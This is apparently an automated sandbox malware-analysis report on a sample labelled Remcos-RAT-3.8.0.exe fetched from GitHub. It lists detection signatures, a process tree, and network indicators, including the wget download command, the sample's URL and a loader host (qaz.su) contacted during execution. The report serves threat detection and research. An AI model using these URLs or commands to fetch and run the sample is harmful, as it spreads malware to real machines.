Edit tour

Windows Analysis Report
https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe

Overview

General Information

Sample URL:https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe
Analysis ID:1644538
Infos:

Detection

Score:72
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected Powershell download and execute
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cmd.exe (PID: 8292 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 8300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wget.exe (PID: 8340 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • Remcos-RAT-3.8.0.exe (PID: 8472 cmdline: "C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe" MD5: 6166F997B4BB3428AE0D9D4B4E1F0DB2)
    • WerFault.exe (PID: 8632 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8472 -s 2184 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: Remcos-RAT-3.8.0.exe PID: 8472JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6136, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, ProcessId: 8292, ProcessName: cmd.exe
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6136, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, ProcessId: 8292, ProcessName: cmd.exe
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6136, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, ProcessId: 8292, ProcessName: cmd.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-20T17:02:28.362047+010028033053Unknown Traffic192.168.2.54972580.87.203.251443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeAvira: detection malicious, Label: HEUR/AGEN.1313721
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeReversingLabs: Detection: 79%
    Source: unknownHTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.5:49722 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 80.87.203.251:443 -> 192.168.2.5:49724 version: TLS 1.2
    Source: Binary string: System32.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Xml.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.ni.pdbRSDS source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: HPdn0C:\Windows\System32.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1399643990.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Users\user\Desktop\download\System32.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.0000000006210000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Configuration.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Xml.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Core.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Windows.Forms.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: mscorlib.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400375747.000000000109B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Users\user\Desktop\download\System32.pdbri source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.0000000006210000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdb4 source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Core.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System32.pdb& source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: C:\Users\Gadr\source\repos\ConsoleApp5\ConsoleApp5\obj\x86\Debug\System32.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.000000000624D000.00000004.00000020.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000000.1335212870.0000000000902000.00000002.00000001.01000000.00000003.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400375747.000000000109B000.00000004.00000020.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe.2.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WER70B5.tmp.dmp.6.dr
    Source: global trafficHTTP traffic detected: GET /load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f06 HTTP/1.1Host: qaz.suConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /index.php?a=download&q=file_not_exist HTTP/1.1Host: qaz.su
    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49725 -> 80.87.203.251:443
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: github.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: raw.githubusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f06 HTTP/1.1Host: qaz.suConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /index.php?a=download&q=file_not_exist HTTP/1.1Host: qaz.su
    Source: global trafficDNS traffic detected: DNS query: github.com
    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
    Source: global trafficDNS traffic detected: DNS query: qaz.su
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg8_=O4wOpy74RXiJCDQ6; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMTSet-Cookie: __ddg10_=1742486547; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMTSet-Cookie: __ddg9_=161.77.13.2; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMTSet-Cookie: __ddg1_=hKS2vVwlRirc6uGFQrhA; Domain=.qaz.su; HttpOnly; Path=/; Expires=Fri, 20-Mar-2026 16:02:27 GMTDate: Thu, 20 Mar 2025 16:02:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4365Vary: Accept-EncodingX-Powered-By: PHP/7.4.27Set-Cookie: PHPSESSID=1etumsf5tr0a1ned2fo14bibpt; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.0000000006210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coCn
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://qaz.im
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://qaz.is
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://qaz.su
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://qaz.sud
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
    Source: wget.exe, 00000002.00000002.1321859775.0000000000B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.
    Source: wget.exe, 00000002.00000002.1321812511.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321812511.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drString found in binary or memory: https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe
    Source: wget.exe, 00000002.00000002.1321812511.0000000000AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exeta
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/contact
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/css/font-awesome.css
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/disclaimer
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/favicon.ico
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/index.php?a=admin
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/index.php?a=download&q=file_not_exist
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/index.php?a=user
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/js/jquery-1.12.4.min.js
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/js/jquery.js
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/js/jquery.tipsy.js
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000000.1335212870.0000000000902000.00000002.00000001.01000000.00000003.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe.2.drString found in binary or memory: https://qaz.su/load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f06
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/privacy
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/style.css?v=2
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qaz.su/tos
    Source: cmdline.out.0.drString found in binary or memory: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe
    Source: wget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exeRxz
    Source: wget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exeT
    Source: wget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exex
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownHTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.5:49722 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 80.87.203.251:443 -> 192.168.2.5:49724 version: TLS 1.2
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeCode function: 3_2_00F608483_2_00F60848
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8472 -s 2184
    Source: classification engineClassification label: mal72.evad.win@6/7@3/3
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8472
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8300:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\83d7cc86-79e3-469f-88f8-cc1d9f894fafJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe"
    Source: unknownProcess created: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe "C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe"
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8472 -s 2184
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: cryptbase.dllJump to behavior
